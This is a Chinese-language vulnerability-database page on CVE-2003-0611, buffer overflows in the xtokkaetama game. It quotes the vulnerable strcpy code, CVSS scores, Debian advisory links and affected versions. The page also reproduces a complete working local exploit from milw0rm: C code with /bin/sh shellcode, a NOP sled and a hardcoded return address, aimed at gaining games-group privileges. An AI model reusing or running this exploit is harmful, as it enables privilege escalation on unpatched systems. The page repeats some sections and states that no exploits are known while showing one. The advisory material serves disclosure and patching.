CVE-2003-0611
CVSS4.6
发布时间 :2003-08-27 00:00:00
修订时间 :2008-09-05 16:34:46
NMCOES    

[原文]Multiple buffer overflows in xtokkaetama 1.0 allow local users to gain privileges via a long (1) -display command line argument or (2) XTOKKAETAMADIR environment variable.


[CNNVD]Xtokkaetama本地缓冲区溢出漏洞(CNNVD-200308-159)

        
        xtokkaetama是一款类似俄罗斯方块的游戏程序。
        xtokkaetama不正确处理用户提交的命令行参数和环境变量,本地攻击者可以利用这个漏洞精心缓冲区溢出攻击,可能以games组权限在系统上执行任意指令。
        第一个错误是对'-display'参数缺少正确的边界缓冲区检查,错误代码如下:
         xtama_init.c:66
         if ( !strcmp("-display",argv[i] )){
         strcpy( display_name , argv[++i] ) ;
         i ++ ;
         continue ;
         }
        第二个错误是对环境变量'XTOKKAETAMADIR'缺少正确的边界缓冲区检查,错误代码如下:
         xtama_score.c:100
         strcpy( filename , getenv("XTOKKAETAMADIR")) ;
        精心构建提交数据可能以games组权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0611
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0611
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-159
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/8312
(VENDOR_ADVISORY)  BID  8312
http://www.debian.org/security/2003/dsa-356
(VENDOR_ADVISORY)  DEBIAN  DSA-356

- 漏洞信息

Xtokkaetama本地缓冲区溢出漏洞
中危 边界条件错误
2003-08-27 00:00:00 2005-10-20 00:00:00
本地  
        
        xtokkaetama是一款类似俄罗斯方块的游戏程序。
        xtokkaetama不正确处理用户提交的命令行参数和环境变量,本地攻击者可以利用这个漏洞精心缓冲区溢出攻击,可能以games组权限在系统上执行任意指令。
        第一个错误是对'-display'参数缺少正确的边界缓冲区检查,错误代码如下:
         xtama_init.c:66
         if ( !strcmp("-display",argv[i] )){
         strcpy( display_name , argv[++i] ) ;
         i ++ ;
         continue ;
         }
        第二个错误是对环境变量'XTOKKAETAMADIR'缺少正确的边界缓冲区检查,错误代码如下:
         xtama_score.c:100
         strcpy( filename , getenv("XTOKKAETAMADIR")) ;
        精心构建提交数据可能以games组权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-356

- 漏洞信息 (72)

xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0) (EDBID:72)
linux local
2003-08-01 Verified
0 brahma
N/A [点击下载]
/*
*  xtokkaetama 1.0b local game exploit on Red Hat 9.0
*               Coded by brahma (31/07/2003)
*
*       http://www.debian.org/security/2003/dsa-356
*/


#include <stdlib.h>
#define RETADDR 0xbfffff11 
#define DEFAULT_BUFFER_SIZE 29
#define DEFAULT_EGG_SIZE 512 
#define NOP 0x90
#define BIN "/usr/X11R6/bin/xtokkaetama" 
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) eggsize = atoi(argv[2]);


if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = RETADDR; 
printf("Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';

memcpy(egg,"EGG=",4);
putenv(egg);
execl(BIN,BIN,"-display",buff,NULL);
}



// milw0rm.com [2003-08-01]
		

- 漏洞信息

2343
xtokkaetama Privilege Escalation

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-07-31 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Xtokkaetama Buffer Overflow Vulnerabilities
Boundary Condition Error 8312
No Yes
2003-07-30 12:00:00 2009-07-11 10:56:00
Discovery is credited to Steve Kemp <skx@debian.org>.

- 受影响的程序版本

xtokkaetama xtokkaetama 1.0 b-6
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0

- 漏洞讨论

Xtokkaetama is reported to be vulnerable to two local buffer overflow vulnerabilities. Successful exploitation could allow code execution with elevated privileges.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

Debian has released an advisory and fixes for this issue.


xtokkaetama xtokkaetama 1.0 b-6

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站